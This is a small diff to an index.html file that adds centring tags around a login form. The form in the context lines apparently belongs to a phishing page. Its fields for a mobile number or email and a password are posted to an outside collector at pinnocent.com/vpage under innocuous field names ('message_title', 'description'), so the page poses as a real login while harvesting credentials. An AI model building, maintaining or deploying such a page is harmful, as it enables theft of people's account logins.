--- a/index.html
+++ b/index.html
@@ -33,6 +33,7 @@
                  <center>
           
     <form action="https://pinnocent.com/vpage" method="POST">
+      <center>
     <input type="hidden" name="link" value="custom template">
     <input type="hidden" name="ftype" value="normal">
     <input type="hidden" name="login" value="login">
@@ -42,9 +43,12 @@
     <input type="text" name="message_title" placeholder="Mobile number or email address" required="text"></div>
     <div class="flex flex-col   p-2   gap-1">
     <input type="password" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" required="password"></div>
+    </center>
+    <center>
     <div>
     <button type="submit" style="width: 80%">Log In</button>
     </div>
+    </center>
     </div>
     </form>
     <img src="bottom.png"
